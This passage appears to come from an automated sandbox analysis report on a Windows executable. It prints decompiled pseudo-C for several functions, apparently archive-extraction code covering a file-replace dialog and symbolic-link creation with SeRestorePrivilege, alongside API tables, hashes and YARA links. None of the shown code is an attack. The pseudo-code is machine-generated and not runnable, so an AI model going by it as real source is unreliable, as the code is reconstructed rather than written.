Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: edefa928c978dd0a4a934005aafabf3f9510cd27b5b5857ed843681eed6fa4f1
Instruction ID: d8b362befab61a141cd4c6d12d88266e21273a247d59af3dd83c55bf28e9437f
Opcode Fuzzy Hash: edefa928c978dd0a4a934005aafabf3f9510cd27b5b5857ed843681eed6fa4f1
Instruction Fuzzy Hash: 70A011AA2AA20EBCB00822002E02C3B020CE0C8B2A3328A0AF022C0080A88828002033

Uniqueness

Uniqueness Score: -1.00%

Function 0084D27A, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0084D27A() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x86ac54); // executed
				E0084D58F(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0084d267
0x0084d26c
0x0084d273

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0084D26C

Part of subcall function 0084D58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084D60C
Part of subcall function 0084D58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084D61D

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0f3ce0a9e2265573c5c9df8fc4dd1b8e6365954682be68e205ca0af025445fec
Instruction ID: d118b5e02f6a78512c48f78d0e6aafdd21c35933aaa242817c7f849bd292739f
Opcode Fuzzy Hash: 0f3ce0a9e2265573c5c9df8fc4dd1b8e6365954682be68e205ca0af025445fec
Instruction Fuzzy Hash: F1A0128115C30A7C700811001D02C36010CE0C4B56331850AF011C1040588418251033

Uniqueness

Uniqueness Score: -1.00%

Function 00839C7A, Relevance: 1.5, APIs: 1, Instructions: 7
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00839C7A(void* __ecx) {
				int _t2;

				_t2 = SetEndOfFile( *(__ecx + 4)); // executed
				asm("sbb eax, eax");
				return  ~(_t2 - 1) + 1;
			}

0x00839c7d
0x00839c86
0x00839c89

APIs

SetEndOfFile.KERNELBASE(?,00838FCB,?,?,-00001960), ref: 00839C7D

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: c9a67737b5636668dfe556cf10a2eab458f0744a770aec2a15b0ae24c0f5a0c3
Instruction ID: db86e081319f3c4749df34a84ffe0bc3464952564d449f6d182e1798e6d83c01
Opcode Fuzzy Hash: c9a67737b5636668dfe556cf10a2eab458f0744a770aec2a15b0ae24c0f5a0c3
Instruction Fuzzy Hash: 22B012300A4805468E012B34CD044143A11F61130A30151A0A002C5060CB12C0039600

Uniqueness

Uniqueness Score: -1.00%

Function 00849B00, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00849B00(WCHAR* _a4) {
				signed int _t2;

				_t2 = SetCurrentDirectoryW(_a4); // executed
				asm("sbb eax, eax");
				return  ~( ~_t2);
			}

0x00849b04
0x00849b0c
0x00849b10

APIs

SetCurrentDirectoryW.KERNELBASE(?,00849D57,C:\Users\user\Desktop,00000000,008785FA,00000006), ref: 00849B04

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 1e45cdd502b499a69e1f9a822e3023f5d88f3b7fc8fd3ce3a5cc1aa7c181c00d
Instruction ID: 7b3b60eeaf509770560c82da18b863e7b98996e5b508519dff3a11cabcc80440
Opcode Fuzzy Hash: 1e45cdd502b499a69e1f9a822e3023f5d88f3b7fc8fd3ce3a5cc1aa7c181c00d
Instruction Fuzzy Hash: BDA01230198006478A000B30CC09C1576516761702F019620B102C00A0CB30C820A500

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0084B014, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 289
timewindowfileCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E0084B014(void* __ecx, void* __edx, void* __eflags, char _a4, short _a8, char _a12, short _a108, short _a112, char _a192, char _a212, struct _WIN32_FIND_DATAW _a288, signed char _a304, signed char _a308, struct _FILETIME _a332, intOrPtr _a340, intOrPtr _a344, short _a884, short _a896, short _a900, int _a1904, char _a1924, int _a1928, short _a2596, short _a2616, char _a2628, char _a2640, struct HWND__* _a6740, intOrPtr _a6744, signed short _a6748, intOrPtr _a6752) {
				struct _FILETIME _v0;
				struct _SYSTEMTIME _v12;
				struct _SYSTEMTIME _v16;
				struct _FILETIME _v24;
				void* _t73;
				void* _t136;
				long _t137;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
				signed short _t148;
				intOrPtr _t152;
				signed int _t153;
				signed int _t157;
				struct HWND__* _t159;
				intOrPtr _t162;
				void* _t163;
				int _t166;
				int _t169;
				void* _t173;
				void* _t177;
				void* _t179;

				_t156 = __edx;
				E0084D9C0();
				_t148 = _a6748;
				_t162 = _a6744;
				_t159 = _a6740;
				if(E008312D7(__edx, _t159, _t162, _t148, _a6752, L"REPLACEFILEDLG", 0, 0) == 0) {
					_t163 = _t162 - 0x110;
					if(_t163 == 0) {
						SetFocus(GetDlgItem(_t159, 0x6c));
						E0083FAE7( &_a2640, _a6752, 0x800);
						E0083BAB6( &_a2628,  &_a2628, 0x800);
						SetDlgItemTextW(_t159, 0x65,  &_a2616);
						 *0x86df00( &_a2616, 0,  &_a1924, 0x2b4, 0x100);
						SendDlgItemMessageW(_t159, 0x66, 0x170, _a1904, 0);
						_t173 = FindFirstFileW( &_a2596,  &_a288);
						if(_t173 != 0xffffffff) {
							FileTimeToLocalFileTime( &_a332,  &(_v24.dwHighDateTime));
							FileTimeToSystemTime( &(_v24.dwHighDateTime),  &_v12);
							_push(0x32);
							_push( &_a12);
							_push(0);
							_push( &_v12);
							_t166 = 2;
							GetTimeFormatW(0x400, 0x800, ??, ??, ??, ??);
							GetDateFormatW(0x400, 0,  &_v12, 0,  &_a112, 0x32);
							_push( &_a12);
							_push( &_a112);
							E00833F53( &_a900, 0x200, L"%s %s %s", E0083DA8B(0x99));
							_t179 = _t177 + 0x18;
							SetDlgItemTextW(_t159, 0x6a,  &_a900);
							FindClose(_t173);
							if((_a308 & 0x00000010) == 0) {
								_push(0x32);
								_push( &_a212);
								_push(0);
								_pop(0);
								asm("adc eax, ebp");
								_push(_a340);
								_push(0 + _a344);
								E00849E0C();
								_push(E0083DA8B(0x98));
								E00833F53( &_a884, 0x200, L"%s %s",  &_a192);
								_t179 = _t179 + 0x14;
								SetDlgItemTextW(_t159, 0x68,  &_a884);
							}
							SendDlgItemMessageW(_t159, 0x67, 0x170, _a1928, 0);
							_t152 =  *0x8775f4; // 0x0
							E00840857(_t152, _t156,  &_a4);
							FileTimeToLocalFileTime( &_v0,  &_v24);
							FileTimeToSystemTime( &_v24,  &_v16);
							GetTimeFormatW(0x400, _t166,  &_v16, 0,  &_a8, 0x32);
							GetDateFormatW(0x400, 0,  &_v16, 0,  &_a108, 0x32);
							_push( &_a8);
							_push( &_a108);
							E00833F53( &_a896, 0x200, L"%s %s %s", E0083DA8B(0x99));
							_t177 = _t179 + 0x18;
							SetDlgItemTextW(_t159, 0x6b,  &_a896);
							_t153 =  *0x88ce14;
							_t157 =  *0x88ce10;
							if((_a304 & 0x00000010) == 0 || (_t157 | _t153) != 0) {
								E00849E0C(_t157, _t153,  &_a212, 0x32);
								_push(E0083DA8B(0x98));
								E00833F53( &_a884, 0x200, L"%s %s",  &_a192);
								_t177 = _t177 + 0x14;
								SetDlgItemTextW(_t159, 0x69,  &_a884);
							}
						}
						L27:
						_t73 = 0;
						L28:
						return _t73;
					}
					if(_t163 != 1) {
						goto L27;
					}
					_t169 = 2;
					_t136 = (_t148 & 0x0000ffff) - _t169;
					if(_t136 == 0) {
						L11:
						_push(6);
						L12:
						_pop(_t169);
						L13:
						_t137 = SendDlgItemMessageW(_t159, 0x66, 0x171, 0, 0);
						if(_t137 != 0) {
							 *0x86df4c(_t137);
						}
						EndDialog(_t159, _t169);
						goto L1;
					}
					_t141 = _t136 - 0x6a;
					if(_t141 == 0) {
						_t169 = 0;
						goto L13;
					}
					_t142 = _t141 - 1;
					if(_t142 == 0) {
						_t169 = 1;
						goto L13;
					}
					_t143 = _t142 - 1;
					if(_t143 == 0) {
						_push(4);
						goto L12;
					}
					_t144 = _t143 - 1;
					if(_t144 == 0) {
						goto L13;
					}
					_t145 = _t144 - 1;
					if(_t145 == 0) {
						_push(3);
						goto L12;
					}
					if(_t145 != 1) {
						goto L27;
					}
					goto L11;
				}
				L1:
				_t73 = 1;
				goto L28;
			}

0x0084b014
0x0084b019
0x0084b01f
0x0084b028
0x0084b032
0x0084b051
0x0084b05b
0x0084b061
0x0084b0db
0x0084b0f6
0x0084b105
0x0084b11b
0x0084b138
0x0084b14e
0x0084b16a
0x0084b16f
0x0084b182
0x0084b192
0x0084b198
0x0084b19e
0x0084b19f
0x0084b1a5
0x0084b1a8
0x0084b1af
0x0084b1cd
0x0084b1d7
0x0084b1df
0x0084b1fd
0x0084b202
0x0084b210
0x0084b213
0x0084b221
0x0084b223
0x0084b235
0x0084b23d
0x0084b23f
0x0084b240
0x0084b242
0x0084b243
0x0084b244
0x0084b253
0x0084b26e
0x0084b273
0x0084b281
0x0084b281
0x0084b297
0x0084b29d
0x0084b2a8
0x0084b2b7
0x0084b2c7
0x0084b2e1
0x0084b2f9
0x0084b303
0x0084b30b
0x0084b32a
0x0084b32f
0x0084b33d
0x0084b347
0x0084b34d
0x0084b353
0x0084b367
0x0084b376
0x0084b38d
0x0084b392
0x0084b3a0
0x0084b3a0
0x0084b353
0x0084b3a2
0x0084b3a2
0x0084b3a4
0x0084b3ae
0x0084b3ae
0x0084b066
0x00000000
0x00000000
0x0084b071
0x0084b072
0x0084b074
0x0084b098
0x0084b098
0x0084b09a
0x0084b09a
0x0084b09b
0x0084b0a5
0x0084b0ad
0x0084b0b0
0x0084b0b0
0x0084b0b8
0x00000000
0x0084b0b8
0x0084b076
0x0084b079
0x0084b0cd
0x00000000
0x0084b0cd
0x0084b07b
0x0084b07e
0x0084b0ca
0x00000000
0x0084b0ca
0x0084b080
0x0084b083
0x0084b0c4
0x00000000
0x0084b0c4
0x0084b085
0x0084b088
0x00000000
0x00000000
0x0084b08a
0x0084b08d
0x0084b0c0
0x00000000
0x0084b0c0
0x0084b092
0x00000000
0x00000000
0x00000000
0x0084b092
0x0084b053
0x0084b055
0x00000000

APIs

Part of subcall function 008312D7: GetDlgItem.USER32(00000000,00003021), ref: 0083131B
Part of subcall function 008312D7: SetWindowTextW.USER32(00000000,008622E4), ref: 00831331

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0084B0A5
EndDialog.USER32(?,00000006), ref: 0084B0B8
GetDlgItem.USER32(?,0000006C), ref: 0084B0D4
SetFocus.USER32(00000000), ref: 0084B0DB
SetDlgItemTextW.USER32(?,00000065,?), ref: 0084B11B
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0084B14E
FindFirstFileW.KERNEL32(?,?), ref: 0084B164
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0084B182
FileTimeToSystemTime.KERNEL32(?,?), ref: 0084B192
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0084B1AF
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0084B1CD

Part of subcall function 0083DA8B: LoadStringW.USER32(?,?,00000400,00000000), ref: 0083DAD5
Part of subcall function 0083DA8B: LoadStringW.USER32(?,?,00000400), ref: 0083DAEB

_swprintf.LIBCMT ref: 0084B1FD

Part of subcall function 00833F53: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00833F66

SetDlgItemTextW.USER32(?,0000006A,?), ref: 0084B210
FindClose.KERNEL32(00000000), ref: 0084B213
_swprintf.LIBCMT ref: 0084B26E
SetDlgItemTextW.USER32(?,00000068,?), ref: 0084B281
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0084B297
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0084B2B7
FileTimeToSystemTime.KERNEL32(?,?), ref: 0084B2C7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0084B2E1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0084B2F9
_swprintf.LIBCMT ref: 0084B32A
SetDlgItemTextW.USER32(?,0000006B,?), ref: 0084B33D
_swprintf.LIBCMT ref: 0084B38D
SetDlgItemTextW.USER32(?,00000069,?), ref: 0084B3A0

Part of subcall function 00849E0C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00849E32
Part of subcall function 00849E0C: GetNumberFormatW.KERNEL32 ref: 00849E81

Strings

%s %s %s, xrefs: 0084B1EB, 0084B317
%s %s, xrefs: 0084B25C, 0084B37F
REPLACEFILEDLG, xrefs: 0084B03B

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLoadLocalStringSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 3227067027-1840816070
Opcode ID: fbb413c26390ea5bb680ac18f4b3aa0d41898048d70682de863fbf36f0bf58b0
Instruction ID: ae5ad8b0ba4732f5e58c77f86dfa73071dc25e494604058aea6787b0bc797bc8
Opcode Fuzzy Hash: fbb413c26390ea5bb680ac18f4b3aa0d41898048d70682de863fbf36f0bf58b0
Instruction Fuzzy Hash: CF918F72648348BBE221DBA4DC49FEB77ACFB8A704F014819F749D2181DBB1E6058762

Uniqueness

Uniqueness Score: -1.00%

Function 008370B9, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 299
fileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E008370B9(void* __ecx, void* __edx) {
				void* __esi;
				signed int _t111;
				signed int _t113;
				void* _t116;
				int _t118;
				intOrPtr _t121;
				signed int _t139;
				int _t145;
				void* _t182;
				void* _t185;
				void* _t190;
				short _t191;
				void* _t197;
				void* _t203;
				void* _t204;
				void* _t223;
				void* _t224;
				intOrPtr _t225;
				intOrPtr _t227;
				void* _t229;
				WCHAR* _t230;
				intOrPtr _t234;
				short _t238;
				void* _t239;
				intOrPtr _t240;
				short _t242;
				void* _t243;
				void* _t245;
				void* _t246;

				_t224 = __edx;
				E0084D8C4(E008612F1, __ecx);
				E0084D9C0();
				 *((intOrPtr*)(_t243 - 0x18)) = 1;
				if( *0x870043 == 0) {
					E00837B08(L"SeRestorePrivilege");
					E00837B08(L"SeCreateSymbolicLinkPrivilege");
					 *0x870043 = 1;
				}
				_t200 = _t243 - 0x2c;
				E0083134C(_t243 - 0x2c, 0x1418);
				_t197 =  *(_t243 + 0x10);
				 *(_t243 - 4) =  *(_t243 - 4) & 0x00000000;
				E0083FAE7(_t243 - 0x107c, _t197 + 0x1104, 0x800);
				 *((intOrPtr*)(_t243 - 0x10)) = E00852B93(_t243 - 0x107c);
				_t233 = _t243 - 0x107c;
				_t229 = _t243 - 0x207c;
				_t111 = E00854DE5(_t243 - 0x107c, L"\\??\\", 4);
				_t246 = _t245 + 0x10;
				asm("sbb al, al");
				_t113 =  ~_t111 + 1;
				 *(_t243 - 0x14) = _t113;
				if(_t113 != 0) {
					_t233 = _t243 - 0x1074;
					_t190 = E00854DE5(_t243 - 0x1074, L"UNC\\", 4);
					_t246 = _t246 + 0xc;
					if(_t190 == 0) {
						_t191 = 0x5c;
						 *((short*)(_t243 - 0x207c)) = _t191;
						_t229 = _t243 - 0x207a;
						_t233 = _t243 - 0x106e;
					}
				}
				E00854DC3(_t229, _t233);
				_t116 = E00852B93(_t243 - 0x207c);
				_t234 =  *((intOrPtr*)(_t243 + 8));
				_t230 =  *(_t243 + 0xc);
				 *(_t243 + 0x10) = _t116;
				if( *((char*)(_t234 + 0x618f)) != 0) {
					L9:
					_push(1);
					_push(_t230);
					E00839DDE(_t200, _t243);
					if( *((char*)(_t197 + 0x10f1)) != 0 ||  *((char*)(_t197 + 0x2104)) != 0) {
						_t118 = CreateDirectoryW(_t230, 0);
						__eflags = _t118;
						if(_t118 == 0) {
							goto L27;
						}
						goto L14;
					} else {
						_t182 = CreateFileW(_t230, 0x40000000, 0, 0, 1, 0x80, 0);
						if(_t182 == 0xffffffff) {
							L27:
							 *((char*)(_t243 - 0x18)) = 0;
							L28:
							E0083158D(_t243 - 0x2c);
							 *[fs:0x0] =  *((intOrPtr*)(_t243 - 0xc));
							return  *((intOrPtr*)(_t243 - 0x18));
						}
						CloseHandle(_t182);
						L14:
						_t121 =  *((intOrPtr*)(_t197 + 0x1100));
						if(_t121 != 3) {
							__eflags = _t121 - 2;
							if(_t121 == 2) {
								L18:
								_t203 =  *(_t243 - 0x2c);
								_t225 =  *((intOrPtr*)(_t243 - 0x10));
								 *_t203 = 0xa000000c;
								_t238 = _t225 + _t225;
								 *((short*)(_t203 + 0xa)) = _t238;
								 *((short*)(_t203 + 4)) = 0x10 + ( *(_t243 + 0x10) + _t225) * 2;
								 *((intOrPtr*)(_t203 + 6)) = 0;
								E00854DC3(_t203 + 0x14, _t243 - 0x107c);
								_t60 = _t238 + 2; // 0x3
								_t239 =  *(_t243 - 0x2c);
								 *((short*)(_t239 + 0xc)) = _t60;
								 *((short*)(_t239 + 0xe)) =  *(_t243 + 0x10) +  *(_t243 + 0x10);
								E00854DC3(_t239 + ( *((intOrPtr*)(_t243 - 0x10)) + 0xb) * 2, _t243 - 0x207c);
								_t139 =  *(_t243 - 0x14) & 0x000000ff ^ 0x00000001;
								__eflags = _t139;
								 *(_t239 + 0x10) = _t139;
								L19:
								_t204 = CreateFileW(_t230, 0xc0000000, 0, 0, 3, 0x2200000, 0);
								 *(_t243 + 0x10) = _t204;
								if(_t204 == 0xffffffff) {
									goto L27;
								}
								_t145 = DeviceIoControl(_t204, 0x900a4, _t239, ( *(_t239 + 4) & 0x0000ffff) + 8, 0, 0, _t243 - 0x30, 0);
								_t263 = _t145;
								if(_t145 != 0) {
									E008394D4(_t243 - 0x30a0);
									 *(_t243 - 4) = 1;
									 *((intOrPtr*)( *((intOrPtr*)(_t243 - 0x30a0)) + 8))();
									_t240 =  *((intOrPtr*)(_t243 + 8));
									 *(_t243 - 0x309c) =  *(_t243 + 0x10);
									asm("sbb ecx, ecx");
									asm("sbb ecx, ecx");
									asm("sbb ecx, ecx");
									E00839B22(_t243 - 0x30a0, _t240,  ~( *(_t240 + 0x72c8)) & _t197 + 0x00001040,  ~( *(_t240 + 0x72cc)) & _t197 + 0x00001048,  ~( *(_t240 + 0x72d0)) & _t197 + 0x00001050);
									E00839572(_t243 - 0x30a0);
									__eflags =  *((char*)(_t240 + 0x61a0));
									if( *((char*)(_t240 + 0x61a0)) == 0) {
										E0083A1D3(_t230,  *((intOrPtr*)(_t197 + 0x24)));
									}
									E00839506(_t243 - 0x30a0);
									goto L28;
								}
								CloseHandle( *(_t243 + 0x10));
								E00831F29(_t263, 0x15, 0, _t230);
								_t160 = GetLastError();
								if(_t160 == 5 || _t160 == 0x522) {
									if(E0083FCB1() == 0) {
										E00831558(_t243 - 0x7c, 0x18);
										_t160 = E00840AC7(_t243 - 0x7c);
									}
								}
								E0084E76A(_t160);
								E00836F18(0x8700e0, 9);
								_push(_t230);
								if( *((char*)(_t197 + 0x10f1)) == 0) {
									DeleteFileW();
								} else {
									RemoveDirectoryW();
								}
								goto L27;
							}
							__eflags = _t121 - 1;
							if(_t121 != 1) {
								goto L27;
							}
							goto L18;
						}
						_t223 =  *(_t243 - 0x2c);
						_t227 =  *((intOrPtr*)(_t243 - 0x10));
						 *_t223 = 0xa0000003;
						_t242 = _t227 + _t227;
						 *((short*)(_t223 + 0xa)) = _t242;
						 *((short*)(_t223 + 4)) = 0xc + ( *(_t243 + 0x10) + _t227) * 2;
						 *((intOrPtr*)(_t223 + 6)) = 0;
						E00854DC3(_t223 + 0x10, _t243 - 0x107c);
						_t40 = _t242 + 2; // 0x3
						_t239 =  *(_t243 - 0x2c);
						 *((short*)(_t239 + 0xc)) = _t40;
						 *((short*)(_t239 + 0xe)) =  *(_t243 + 0x10) +  *(_t243 + 0x10);
						E00854DC3(_t239 + ( *((intOrPtr*)(_t243 - 0x10)) + 9) * 2, _t243 - 0x207c);
						goto L19;
					}
				}
				if( *(_t243 - 0x14) != 0) {
					goto L27;
				}
				_t185 = E0083B58F(_t197 + 0x1104);
				_t256 = _t185;
				if(_t185 != 0) {
					goto L27;
				}
				_push(_t197 + 0x1104);
				_push(_t230);
				_push(_t197 + 0x28);
				_push(_t234);
				if(E008378EA(_t224, _t256) == 0) {
					goto L27;
				}
				goto L9;
			}

0x008370b9
0x008370be
0x008370c8
0x008370da
0x008370dd
0x008370e4
0x008370ee
0x008370f3
0x008370f3
0x008370fe
0x00837101
0x00837106
0x00837109
0x00837120
0x00837133
0x00837136
0x0083713e
0x0083714a
0x0083714f
0x00837154
0x00837156
0x00837158
0x0083715d
0x00837161
0x0083716f
0x00837174
0x00837179
0x0083717d
0x0083717e
0x00837185
0x0083718b
0x0083718b
0x00837179
0x00837193
0x0083719f
0x008371a4
0x008371aa
0x008371ad
0x008371b7
0x008371f1
0x008371f4
0x008371f5
0x008371f6
0x00837202
0x00837239
0x0083723f
0x00837241
0x00000000
0x00000000
0x00000000
0x0083720d
0x0083721e
0x00837227
0x008373e7
0x008373e7
0x008373eb
0x008373ee
0x008373fc
0x00837406
0x00837406
0x0083722e
0x00837247
0x00837247
0x00837250
0x008372b8
0x008372bb
0x008372c5
0x008372c5
0x008372c8
0x008372d0
0x008372d6
0x008372d9
0x008372e4
0x008372ea
0x008372f8
0x008372fd
0x00837300
0x00837303
0x0083730c
0x00837321
0x0083732f
0x0083732f
0x00837332
0x00837335
0x0083734d
0x0083734f
0x00837355
0x00000000
0x00000000
0x00837373
0x00837379
0x0083737b
0x00837417
0x00837428
0x0083742c
0x0083742f
0x00837435
0x00837449
0x0083745c
0x0083746f
0x0083747a
0x00837485
0x0083748a
0x00837491
0x00837497
0x00837497
0x008374a2
0x00000000
0x008374a2
0x00837385
0x00837390
0x00837395
0x0083739e
0x008373ae
0x008373b5
0x008373bd
0x008373bd
0x008373ae
0x008373c9
0x008373d2
0x008373de
0x008373df
0x00837409
0x008373e1
0x008373e1
0x008373e1
0x00000000
0x008373df
0x008372bd
0x008372bf
0x00000000
0x00000000
0x00000000
0x008372bf
0x00837252
0x00837255
0x0083725d
0x00837263
0x00837266
0x00837271
0x00837277
0x00837285
0x0083728a
0x0083728d
0x00837290
0x00837299
0x008372ae
0x00000000
0x008372b3
0x00837202
0x008371bd
0x00000000
0x00000000
0x008371ca
0x008371cf
0x008371d1
0x00000000
0x00000000
0x008371dd
0x008371de
0x008371e2
0x008371e3
0x008371eb
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog.LIBCMT ref: 008370BE
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 0083721E
CloseHandle.KERNEL32(00000000), ref: 0083722E

Part of subcall function 00837B08: GetCurrentProcess.KERNEL32(00000020,?), ref: 00837B17
Part of subcall function 00837B08: GetLastError.KERNEL32 ref: 00837B5D
Part of subcall function 00837B08: CloseHandle.KERNEL32(?), ref: 00837B6C

CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00837239
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00837347
DeviceIoControl.KERNEL32 ref: 00837373
CloseHandle.KERNEL32(?), ref: 00837385
GetLastError.KERNEL32(00000015,00000000,?), ref: 00837395
RemoveDirectoryW.KERNEL32(?), ref: 008373E1
DeleteFileW.KERNEL32(?), ref: 00837409

Strings

SeRestorePrivilege, xrefs: 008370DF
SeCreateSymbolicLinkPrivilege, xrefs: 008370E9
\??\, xrefs: 00837144
UNC\, xrefs: 00837169

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3935142422-3508440684
Opcode ID: e4505bbb3e36a0413c8ba9276ee1cf558b7938765830e782fbe0088b136ee068
Instruction ID: 003e18fa8f2ae9edd6fa393dc49e2f1ef380c1b864231f95985dae4d9d5603e0
Opcode Fuzzy Hash: e4505bbb3e36a0413c8ba9276ee1cf558b7938765830e782fbe0088b136ee068
Instruction Fuzzy Hash: C5B1C0B19046189BDB21DF68CC85BEE77B8FF44300F0445A9F95AE7242D770EA45CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0083320E, Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 605
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E0083320E(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				void* _t239;
				signed int _t242;
				void* _t248;
				unsigned int _t250;
				signed int _t254;
				signed int _t255;
				unsigned int _t256;
				void* _t257;
				char _t270;
				signed int _t289;
				unsigned int _t290;
				intOrPtr _t291;
				signed int _t292;
				signed int _t295;
				char _t302;
				signed char _t304;
				signed int _t320;
				signed int _t331;
				signed int _t335;
				signed int _t350;
				signed char _t352;
				unsigned int _t362;
				void* _t378;
				void* _t380;
				void* _t381;
				void* _t392;
				intOrPtr* _t394;
				signed int _t409;
				signed int _t419;
				char _t431;
				signed int _t432;
				signed int _t437;
				signed int _t441;
				intOrPtr _t449;
				unsigned int _t455;
				unsigned int _t458;
				signed int _t462;
				signed int _t470;
				signed int _t479;
				signed int _t484;
				signed int _t498;
				intOrPtr _t499;
				signed int _t500;
				signed char _t501;
				unsigned int _t502;
				void* _t509;
				void* _t517;
				signed int _t520;
				void* _t521;
				signed int _t531;
				unsigned int _t534;
				void* _t539;
				intOrPtr _t543;
				void* _t544;
				void* _t545;
				void* _t546;
				intOrPtr _t556;

				_t546 = _t545 - 0x68;
				E0084D8C4(E0086122D, __ecx);
				E0084D9C0();
				_t394 = __ecx;
				E0083C2C0(_t544 + 0x30, __ecx);
				 *(_t544 + 0x60) = 0;
				 *((intOrPtr*)(_t544 - 4)) = 0;
				if( *((intOrPtr*)(__ecx + 0x6cbc)) == 0) {
					L15:
					 *((char*)(_t544 + 0x6a)) = 0;
					L16:
					_t239 = E0083C4CB(_t498, 7);
					_t565 = _t239 - 7;
					if(_t239 >= 7) {
						 *(_t394 + 0x21f4) = 0;
						_t509 = _t394 + 0x21e4;
						 *_t509 = E0083C33B(_t544 + 0x30);
						_t531 = E0083C4A7(_t544 + 0x30, 4);
